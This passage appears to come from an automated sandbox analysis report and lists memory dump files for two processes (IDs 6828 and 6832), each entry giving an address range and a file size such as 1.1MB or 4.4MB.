                                                                                                                                                                    • memory/6828-695-0x00007FFABA800000-0x00007FFABA918000-memory.dmp
                                                                                                                                                                      Filesize

                                                                                                                                                                      1.1MB

                                                                                                                                                                    • memory/6828-848-0x00007FFABACC0000-0x00007FFABAD77000-memory.dmp
                                                                                                                                                                      Filesize

                                                                                                                                                                      732KB

                                                                                                                                                                    • memory/6828-692-0x00007FFABA920000-0x00007FFABA935000-memory.dmp
                                                                                                                                                                      Filesize

                                                                                                                                                                      84KB

                                                                                                                                                                    • memory/6828-693-0x00007FFAC4070000-0x00007FFAC407D000-memory.dmp
                                                                                                                                                                      Filesize

                                                                                                                                                                      52KB

                                                                                                                                                                    • memory/6828-691-0x00007FFABAF00000-0x00007FFABB365000-memory.dmp
                                                                                                                                                                      Filesize

                                                                                                                                                                      4.4MB

                                                                                                                                                                    • memory/6828-673-0x00007FFABBBA0000-0x00007FFABBBCC000-memory.dmp
                                                                                                                                                                      Filesize

                                                                                                                                                                      176KB

                                                                                                                                                                    • memory/6828-857-0x00007FFABA800000-0x00007FFABA918000-memory.dmp
                                                                                                                                                                      Filesize

                                                                                                                                                                      1.1MB

                                                                                                                                                                    • memory/6828-658-0x00007FFABCCA0000-0x00007FFABCCC4000-memory.dmp
                                                                                                                                                                      Filesize

                                                                                                                                                                      144KB

                                                                                                                                                                    • memory/6828-834-0x00007FFABC8C0000-0x00007FFABC8DE000-memory.dmp
                                                                                                                                                                      Filesize

                                                                                                                                                                      120KB

                                                                                                                                                                    • memory/6828-644-0x00007FFABAF00000-0x00007FFABB365000-memory.dmp
                                                                                                                                                                      Filesize

                                                                                                                                                                      4.4MB

                                                                                                                                                                    • memory/6828-663-0x00007FFAC7530000-0x00007FFAC753F000-memory.dmp
                                                                                                                                                                      Filesize

                                                                                                                                                                      60KB

                                                                                                                                                                    • memory/6828-980-0x00007FFABAD80000-0x00007FFABAEF1000-memory.dmp
                                                                                                                                                                      Filesize

                                                                                                                                                                      1.4MB

                                                                                                                                                                    • memory/6828-974-0x00007FFABAF00000-0x00007FFABB365000-memory.dmp
                                                                                                                                                                      Filesize

                                                                                                                                                                      4.4MB

                                                                                                                                                                    • memory/6828-845-0x00007FFAC4620000-0x00007FFAC462D000-memory.dmp
                                                                                                                                                                      Filesize

                                                                                                                                                                      52KB

                                                                                                                                                                    • memory/6828-676-0x00007FFABCA60000-0x00007FFABCA78000-memory.dmp
                                                                                                                                                                      Filesize

                                                                                                                                                                      96KB

                                                                                                                                                                    • memory/6828-975-0x00007FFABCCA0000-0x00007FFABCCC4000-memory.dmp
                                                                                                                                                                      Filesize

                                                                                                                                                                      144KB

                                                                                                                                                                    • memory/6828-847-0x00007FFABBB50000-0x00007FFABBB7E000-memory.dmp
                                                                                                                                                                      Filesize

                                                                                                                                                                      184KB

                                                                                                                                                                    • memory/6828-842-0x00007FFABBB80000-0x00007FFABBB99000-memory.dmp
                                                                                                                                                                      Filesize

                                                                                                                                                                      100KB

                                                                                                                                                                    • memory/6832-879-0x00007FFABCE10000-0x00007FFABCE34000-memory.dmp
                                                                                                                                                                      Filesize

                                                                                                                                                                      144KB

                                                                                                                                                                    • memory/6832-843-0x00007FFABCDE0000-0x00007FFABCE0C000-memory.dmp
                                                                                                                                                                      Filesize

                                                                                                                                                                      176KB

                                                                                                                                                                    • memory/6832-846-0x00007FFABCDA0000-0x00007FFABCDBE000-memory.dmp
                                                                                                                                                                      Filesize

                                                                                                                                                                      120KB

                                                                                                                                                                    • memory/6832-836-0x00007FFABE8B0000-0x00007FFABE8BF000-memory.dmp
                                                                                                                                                                      Filesize

                                                                                                                                                                      60KB

                                                                                                                                                                    • memory/6832-880-0x00007FFABE8B0000-0x00007FFABE8BF000-memory.dmp
                                                                                                                                                                      Filesize

                                                                                                                                                                      60KB

                                                                                                                                                                    • memory/6832-833-0x00007FFABB530000-0x00007FFABB995000-memory.dmp
                                                                                                                                                                      Filesize

                                                                                                                                                                      4.4MB

                                                                                                                                                                    • memory/6832-849-0x00007FFABBC50000-0x00007FFABBDC1000-memory.dmp
                                                                                                                                                                      Filesize

                                                                                                                                                                      1.4MB

                                                                                                                                                                    • memory/6832-858-0x00007FFAD35F0000-0x00007FFAD3605000-memory.dmp
                                                                                                                                                                      Filesize

                                                                                                                                                                      84KB

                                                                                                                                                                    • memory/6832-859-0x00007FFACCDB0000-0x00007FFACCDBD000-memory.dmp
                                                                                                                                                                      Filesize

                                                                                                                                                                      52KB

                                                                                                                                                                    • memory/6832-860-0x00007FFABB530000-0x00007FFABB995000-memory.dmp
                                                                                                                                                                      Filesize

                                                                                                                                                                      4.4MB

                                                                                                                                                                    • memory/6832-875-0x00007FFABCDC0000-0x00007FFABCDD8000-memory.dmp
                                                                                                                                                                      Filesize

                                                                                                                                                                      96KB

                                                                                                                                                                    • memory/6832-881-0x00007FFABCDE0000-0x00007FFABCE0C000-memory.dmp
                                                                                                                                                                      Filesize

                                                                                                                                                                      176KB

                                                                                                                                                                    • memory/6832-877-0x00007FFABC390000-0x00007FFABC447000-memory.dmp
                                                                                                                                                                      Filesize

                                                                                                                                                                      732KB

                                                                                                                                                                    • memory/6832-878-0x00007FFACCDB0000-0x00007FFACCDBD000-memory.dmp
                                                                                                                                                                      Filesize

                                                                                                                                                                      52KB

                                                                                                                                                                    • memory/6832-835-0x00007FFABCE10000-0x00007FFABCE34000-memory.dmp
                                                                                                                                                                      Filesize

                                                                                                                                                                      144KB

                                                                                                                                                                    • memory/6832-844-0x00007FFABCDC0000-0x00007FFABCDD8000-memory.dmp
                                                                                                                                                                      Filesize

                                                                                                                                                                      96KB

                                                                                                                                                                    • memory/6832-876-0x00007FFABCDA0000-0x00007FFABCDBE000-memory.dmp
                                                                                                                                                                      Filesize

                                                                                                                                                                      120KB

                                                                                                                                                                    • memory/6832-882-0x00007FFABBC50000-0x00007FFABBDC1000-memory.dmp
                                                                                                                                                                      Filesize

                                                                                                                                                                      1.4MB

                                                                                                                                                                    • memory/6832-883-0x00007FFABCD80000-0x00007FFABCD99000-memory.dmp
                                                                                                                                                                      Filesize

                                                                                                                                                                      100KB

                                                                                                                                                                    • memory/6832-884-0x00007FFABCD70000-0x00007FFABCD7D000-memory.dmp
                                                                                                                                                                      Filesize

                                                                                                                                                                      52KB

                                                                                                                                                                    • memory/6832-886-0x00007FFABA0F0000-0x00007FFABA467000-memory.dmp
                                                                                                                                                                      Filesize

                                                                                                                                                                      3.5MB

                                                                                                                                                                    • memory/6832-887-0x00007FFAD35F0000-0x00007FFAD3605000-memory.dmp
                                                                                                                                                                      Filesize

                                                                                                                                                                      84KB

                                                                                                                                                                    • memory/6832-885-0x00007FFABCD40000-0x00007FFABCD6E000-memory.dmp
                                                                                                                                                                      Filesize

                                                                                                                                                                      184KB

                                                                                                                                                                    • memory/6832-861-0x00007FFABB530000-0x00007FFABB995000-memory.dmp
                                                                                                                                                                      Filesize

                                                                                                                                                                      4.4MB

                                                                                                                                                                    • memory/6832-852-0x00007FFABCD80000-0x00007FFABCD99000-memory.dmp
                                                                                                                                                                      Filesize

                                                                                                                                                                      100KB

                                                                                                                                                                    • memory/6832-853-0x00007FFABCD70000-0x00007FFABCD7D000-memory.dmp
                                                                                                                                                                      Filesize

                                                                                                                                                                      52KB

                                                                                                                                                                    • memory/6832-854-0x00007FFABCD40000-0x00007FFABCD6E000-memory.dmp
                                                                                                                                                                      Filesize

                                                                                                                                                                      184KB

                                                                                                                                                                    • memory/6832-855-0x00007FFABA0F0000-0x00007FFABA467000-memory.dmp
                                                                                                                                                                      Filesize

                                                                                                                                                                      3.5MB

                                                                                                                                                                    • memory/6832-856-0x00007FFABC390000-0x00007FFABC447000-memory.dmp
                                                                                                                                                                      Filesize

                                                                                                                                                                      732KB